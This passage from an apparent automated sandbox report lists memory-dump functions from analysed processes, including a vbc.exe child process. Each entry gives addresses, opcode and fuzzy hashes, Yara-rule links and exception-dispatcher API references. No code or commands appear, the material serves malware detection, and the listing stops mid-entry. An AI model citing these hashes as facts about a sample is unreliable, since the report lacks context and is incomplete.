                                                                                                • Opcode ID: b77762155d9ceb3e052632e0144c5e990c2da4bbf6f2a1a0550c73243bc3c64f
                                                                                                • Instruction ID: 3163fc906a6ddd51b4fad6334def6dabfd2ae0dd4cc1febf327813f9b44c51cf
                                                                                                • Opcode Fuzzy Hash: b77762155d9ceb3e052632e0144c5e990c2da4bbf6f2a1a0550c73243bc3c64f
                                                                                                • Instruction Fuzzy Hash: 045130749142098BDB44FFBAE844ADE7BF3AB88304F148979D015AB264DB70690ADB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DD818, Relevance: .3, Instructions: 259COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d401f71e841a7ef0fba6833914997b19578b6d1bba674c10c1ca7786171f418
                                                                                                • Instruction ID: ebc6d9b839515262d7546f577421133588eb4b384007a095ca28e33ce1d3e700
                                                                                                • Opcode Fuzzy Hash: 8d401f71e841a7ef0fba6833914997b19578b6d1bba674c10c1ca7786171f418
                                                                                                • Instruction Fuzzy Hash: 7AB120B4E00218CFDB14DFE9E8946AEBBF2BF89315F64906AD409A7344DB309981DF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007415C0, Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5383f29cfa94b0f88fbfcaea9f033e1e336cb1809185840f8e8cd9f125d36856
                                                                                                • Instruction ID: 2eb458d0735ffac1fe4d68af2df040348aead894eaa85c818187871bd689a3b6
                                                                                                • Opcode Fuzzy Hash: 5383f29cfa94b0f88fbfcaea9f033e1e336cb1809185840f8e8cd9f125d36856
                                                                                                • Instruction Fuzzy Hash: 07119130C052588FCB109FB4C8587FDBBF0AB4E301F2894AAD055B3291CB788988DF69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007415D0, Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 968ef7fe90fd99bfb6df4dfc0c15a935a988c83f007d2a5469c987840805e402
                                                                                                • Instruction ID: 44ff3b383dfd99e4ef89a760c3c453fb2ef55194cf9ae1c2676d3f56683b8432
                                                                                                • Opcode Fuzzy Hash: 968ef7fe90fd99bfb6df4dfc0c15a935a988c83f007d2a5469c987840805e402
                                                                                                • Instruction Fuzzy Hash: 5C117C30D042188FDB14DFA5C858BFDBAF0AB4E301F699469D415B3290CB788A84DF69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Analysis Process: vbc.exe PID: 552 Parent PID: 1616 vbc.exeCOMMON

                                                                                                Executed Functions

                                                                                                Function 002D85C8, Relevance: 4.0, APIs: 2, Instructions: 976COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 12b9832d586d841f08cb47153e63b5a6858908935c4709fcead1cc5466541a61
                                                                                                • Instruction ID: ff90ba350c4331516fbc7e0c159ea59325be41777e8500174128bbf5ace14dae
                                                                                                • Opcode Fuzzy Hash: 12b9832d586d841f08cb47153e63b5a6858908935c4709fcead1cc5466541a61
                                                                                                • Instruction Fuzzy Hash: 62A233B4A19228CFCB64AF60D85869DB7B6BF88305F2084EAD549A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D85E9, Relevance: 3.6, APIs: 2, Instructions: 632COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f4ba6861dfe05133f8798120f8920399c28cf0699edfa187baa452785e2a7511
                                                                                                • Instruction ID: ae5def3b3257f31c19d01fdc4aea3250847f107935d924d706e7d270db7df5da
                                                                                                • Opcode Fuzzy Hash: f4ba6861dfe05133f8798120f8920399c28cf0699edfa187baa452785e2a7511
                                                                                                • Instruction Fuzzy Hash: 995235B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD549A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D862E, Relevance: 3.6, APIs: 2, Instructions: 625COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fc0bc184936067e874936348565b2c703a5f57d32866f51dd3082b59e258eac1
                                                                                                • Instruction ID: d169733ec8bdc1c12e48e09b8befa4eb3b0dd86b53093420fed3d57fc0bf4e38
                                                                                                • Opcode Fuzzy Hash: fc0bc184936067e874936348565b2c703a5f57d32866f51dd3082b59e258eac1
                                                                                                • Instruction Fuzzy Hash: 375235B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD549A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8673, Relevance: 3.6, APIs: 2, Instructions: 618COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1a4507e156f8a97544ab9053dd51fcdb387ef90e3953cecb76f1b5a41bf8261
                                                                                                • Instruction ID: b835c1ab698bab0f340de78d6b3f7a9f00d53ee7c5b5009e2b019d8185e2d009
                                                                                                • Opcode Fuzzy Hash: d1a4507e156f8a97544ab9053dd51fcdb387ef90e3953cecb76f1b5a41bf8261
                                                                                                • Instruction Fuzzy Hash: EF5235B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD549A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D86B8, Relevance: 3.6, APIs: 2, Instructions: 611COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 44d46e89d3af7561c3fa23173669082a4ae49ffb688f0261796a928430e16ff3
                                                                                                • Instruction ID: c75bf7a0040b5b4bab7b7c25880806e9fb44513e377fc555f2e6d54c5abedac2
                                                                                                • Opcode Fuzzy Hash: 44d46e89d3af7561c3fa23173669082a4ae49ffb688f0261796a928430e16ff3
                                                                                                • Instruction Fuzzy Hash: 785235B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D86FD, Relevance: 3.6, APIs: 2, Instructions: 604COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 59b58a1dff2ef13ce6ce4415085a279ad81caca75d2aef738b16937bed34b9b8
                                                                                                • Instruction ID: 6c1ce76e6135e5757162bfb75277c218ff863fc6fb66c3dc653d161ce508367d
                                                                                                • Opcode Fuzzy Hash: 59b58a1dff2ef13ce6ce4415085a279ad81caca75d2aef738b16937bed34b9b8
                                                                                                • Instruction Fuzzy Hash: C65234B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8742, Relevance: 3.6, APIs: 2, Instructions: 597COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9a8e274c70eeb403acc6757cc2cdaa22ba9654b4bceb71393118dc1f354bb12f
                                                                                                • Instruction ID: a4101836ab1b88db29f88c12add72ddde4ce8d7a16d5003858681329b5e86bf6
                                                                                                • Opcode Fuzzy Hash: 9a8e274c70eeb403acc6757cc2cdaa22ba9654b4bceb71393118dc1f354bb12f
                                                                                                • Instruction Fuzzy Hash: AB5234B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD549A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8787, Relevance: 3.6, APIs: 2, Instructions: 590COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b3049fb725c2b987490a0ad778ea6828912cf855f5fc4fcde5d5c0590bebd19f
                                                                                                • Instruction ID: 003216dfdfade05742e72dac840bce1a2f8e799f2e4388ef14103dde8023b897
                                                                                                • Opcode Fuzzy Hash: b3049fb725c2b987490a0ad778ea6828912cf855f5fc4fcde5d5c0590bebd19f
                                                                                                • Instruction Fuzzy Hash: 8E5234B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D87CC, Relevance: 3.6, APIs: 2, Instructions: 583COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89a70aab24f0a76ccdbe128a9b35d402e8dcaf22e4fb0b9f869e8eb8d3b64fc6
                                                                                                • Instruction ID: c96ed9a56ebf73cfca3025ff2c44cca98b40d49966417b90a1bc41de598e41f2
                                                                                                • Opcode Fuzzy Hash: 89a70aab24f0a76ccdbe128a9b35d402e8dcaf22e4fb0b9f869e8eb8d3b64fc6
                                                                                                • Instruction Fuzzy Hash: 494235B4A19228CFCB64AF60D85869DB7B6BF48304F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8811, Relevance: 3.6, APIs: 2, Instructions: 576COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c6c4b2096bcdc4155718fb7149efbbc886fdb0ee1a7aece03e52af45636d77b
                                                                                                • Instruction ID: eb0082f0582abe442ac9e5a8b4e4e33ec43f34d24267f038c17416942645c503
                                                                                                • Opcode Fuzzy Hash: 8c6c4b2096bcdc4155718fb7149efbbc886fdb0ee1a7aece03e52af45636d77b
                                                                                                • Instruction Fuzzy Hash: 0E4234B4A19228CFCB64AF60D85869DB7B6BF48305F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8856, Relevance: 3.6, APIs: 2, Instructions: 567COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 20e052685456083de858356df38064a93a78e0be37b72393c2ad64bfce2e101a
                                                                                                • Instruction ID: f7dac888e9efc0e18b7432a1ee55caf8c4269e83d7eeb094eb80c2375202304f
                                                                                                • Opcode Fuzzy Hash: 20e052685456083de858356df38064a93a78e0be37b72393c2ad64bfce2e101a
                                                                                                • Instruction Fuzzy Hash: A34235B4A19228CFCB64AF60D85869DB7B6BF48305F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8892, Relevance: 3.6, APIs: 2, Instructions: 562COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5fad84d5093f32aca6dd8b0158712a3b29a18bdcfdf1e8b2cf78e7feb94950d1
                                                                                                • Instruction ID: 57cf27bc14831c219a1f1107652932b2091f8e8a2f6ddbd879d7d7425a4fd0ed
                                                                                                • Opcode Fuzzy Hash: 5fad84d5093f32aca6dd8b0158712a3b29a18bdcfdf1e8b2cf78e7feb94950d1
                                                                                                • Instruction Fuzzy Hash: C14235B4A19228CFCB64AF60D85869DB7B6BF48305F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D88D7, Relevance: 3.6, APIs: 2, Instructions: 555COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fa8af6033c8aced0554b83955f95378e656ead49031041e98b0f4ee0396f5b6d
                                                                                                • Instruction ID: 282fa5aef2f78807277cfe0bc0facafcafed38e7d56139f59a3aca28ca4275c0
                                                                                                • Opcode Fuzzy Hash: fa8af6033c8aced0554b83955f95378e656ead49031041e98b0f4ee0396f5b6d
                                                                                                • Instruction Fuzzy Hash: A94226B4A19228CFCB64AF60D85869DB7B6BF48305F6088EAD509A7350DF309EC5DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8D35, Relevance: 3.4, APIs: 2, Instructions: 388COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 94c3e6849f3a5195788a8299198dec4e1d2badbce3b93c1fe7c767f38e920479
                                                                                                • Instruction ID: 801fcd54621d21530aecbb83c012a54c16f356033d089e9f8bcfc5c2231c7a2f
                                                                                                • Opcode Fuzzy Hash: 94c3e6849f3a5195788a8299198dec4e1d2badbce3b93c1fe7c767f38e920479
                                                                                                • Instruction Fuzzy Hash: 1E0215B4A15228CFCB64AF20D85469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8D90, Relevance: 3.4, APIs: 2, Instructions: 377COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: dd0919c25b53025e05bad9cfb98a07f0d006dec742d7bb8c4d45b2b21d748d24
                                                                                                • Instruction ID: 03872ceed39f23625c830998de24937a4541b5cd422363759e467d8a50b0d41a
                                                                                                • Opcode Fuzzy Hash: dd0919c25b53025e05bad9cfb98a07f0d006dec742d7bb8c4d45b2b21d748d24
                                                                                                • Instruction Fuzzy Hash: CF0235B4915228CFCB64AF20D85469CB7B6BF48304F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8DD5, Relevance: 3.4, APIs: 2, Instructions: 370COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 16bc7415e7c690e72f97fe08f6c626eb82693e6e427ee2c37869dd93cad67b84
                                                                                                • Instruction ID: 8d3427247db2ab7bb661e168978160335e1fd3a1a24efa663df9ce8cde8ccd45
                                                                                                • Opcode Fuzzy Hash: 16bc7415e7c690e72f97fe08f6c626eb82693e6e427ee2c37869dd93cad67b84
                                                                                                • Instruction Fuzzy Hash: 1D0226B4A15228CFCB64AF20D85469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8E1A, Relevance: 3.4, APIs: 2, Instructions: 361COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: b6c07e3c1f1c0248fcf8ff1a70d3f4ea00c5cef29e0456a48f4de2b742c4714a
                                                                                                • Instruction ID: 7d9f33536496a9bad5a9b5d6e4a86bd55789bdfaade3eee8d5fdb381dd65b776
                                                                                                • Opcode Fuzzy Hash: b6c07e3c1f1c0248fcf8ff1a70d3f4ea00c5cef29e0456a48f4de2b742c4714a
                                                                                                • Instruction Fuzzy Hash: B60227B4915228CFCB64AF20D85469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8E56, Relevance: 3.4, APIs: 2, Instructions: 356COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 9187b1b2f4076686c3f198ecaa61c2c1bc181928fd543f483b2ebbb91953ffb6
                                                                                                • Instruction ID: 53346c4a3e45f0831e850f6662377f0e5984921aba5cb73808326888f9b9d7a0
                                                                                                • Opcode Fuzzy Hash: 9187b1b2f4076686c3f198ecaa61c2c1bc181928fd543f483b2ebbb91953ffb6
                                                                                                • Instruction Fuzzy Hash: 80F126B4A15228CFCB64AF20D85469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8E9B, Relevance: 3.3, APIs: 2, Instructions: 349COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: acc9341119576f079d68fdf1be7cf49c0bc7c3a054baa5e3142b0c1f170d43cd
                                                                                                • Instruction ID: 312ad21622f4605c21a0d5b8215c64fb60d75717f77798220ca27f2b54fb5079
                                                                                                • Opcode Fuzzy Hash: acc9341119576f079d68fdf1be7cf49c0bc7c3a054baa5e3142b0c1f170d43cd
                                                                                                • Instruction Fuzzy Hash: 0EF137B4A15218CFCB64AF20D89469CB7B6BF48304F6088EAD649A7350DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8EE0, Relevance: 3.3, APIs: 2, Instructions: 342COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 4ad40c9a414655a09a6e62735e6049954c5197d35fe4fe8cc7e85b64c581b0bb
                                                                                                • Instruction ID: 8503b5b56768b60e04170c9fff21ec67ae12dcac3e0f9405673fc54ef63d01bf
                                                                                                • Opcode Fuzzy Hash: 4ad40c9a414655a09a6e62735e6049954c5197d35fe4fe8cc7e85b64c581b0bb
                                                                                                • Instruction Fuzzy Hash: 7AF127B4A15218CFCB64AF20D85469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8F28, Relevance: 3.3, APIs: 2, Instructions: 335COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 24e77012ab3916c7fa14b5f3d64a286e2fc504f94c03302351d1032cc161f5b4
                                                                                                • Instruction ID: 054bccbede5233d71093c2608cbb83905e68f2fbee96c9f47de7a72e761e2501
                                                                                                • Opcode Fuzzy Hash: 24e77012ab3916c7fa14b5f3d64a286e2fc504f94c03302351d1032cc161f5b4
                                                                                                • Instruction Fuzzy Hash: 06F126B4A15218CFCB64AF20D89469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8F70, Relevance: 3.3, APIs: 2, Instructions: 326COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: e7f743d5441a3835241f83453be1c01f72590c17845484831752cf474b2c398f
                                                                                                • Instruction ID: 8aad79f76a84473af695f52d84fb8e223e0f8b5285f8e0cbe1f2d48a27f6f774
                                                                                                • Opcode Fuzzy Hash: e7f743d5441a3835241f83453be1c01f72590c17845484831752cf474b2c398f
                                                                                                • Instruction Fuzzy Hash: 3AE126B4A15218CFCB64AF20D89469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8FAC, Relevance: 3.3, APIs: 2, Instructions: 321COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 51d3c2f87d37be69072819f6c118abe2d3774307e4db6bdb3e69e8fc2fc7f578
                                                                                                • Instruction ID: c3cc9c9abf92c32f792249c2f089c1a0c863af6a7354b98e3033d047be7bfa49
                                                                                                • Opcode Fuzzy Hash: 51d3c2f87d37be69072819f6c118abe2d3774307e4db6bdb3e69e8fc2fc7f578
                                                                                                • Instruction Fuzzy Hash: 68E136B4A15218CFCB64AF20D89469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D8FF4, Relevance: 3.3, APIs: 2, Instructions: 314COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 694e22e29022ab4826dc0d42eddc28b2d6f0c156afc2e83c4604dda50b1cb5d1
                                                                                                • Instruction ID: d1622afa102e15a17a0ce36ad8566f083c0bb1699012c3b79258085dc10deaf7
                                                                                                • Opcode Fuzzy Hash: 694e22e29022ab4826dc0d42eddc28b2d6f0c156afc2e83c4604dda50b1cb5d1
                                                                                                • Instruction Fuzzy Hash: CFE127B4A15215CBCB64EF20C89469CB7B6BF48305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D903C, Relevance: 3.3, APIs: 2, Instructions: 307COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: c90a16af221e1b1f30fd24430117473b8ef8b8bdee2cf440de61d67bb82b2a41
                                                                                                • Instruction ID: 88aa030e01553b1f9f38d6f4a1efec5986dd001ddcb442f24797925f0d4b0924
                                                                                                • Opcode Fuzzy Hash: c90a16af221e1b1f30fd24430117473b8ef8b8bdee2cf440de61d67bb82b2a41
                                                                                                • Instruction Fuzzy Hash: 87E128B4A15215CBCB64EF20C89469CB7B6BF88305F6088EAD649A7340DF309EC6DF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 002D9084, Relevance: 3.3, APIs: 2, Instructions: 300COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D9483
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 002D94E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2359484134.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 1c75080a6510c7af051f27aa679eaa6568ac8a48828f1a875ccf9355ff5ef64d
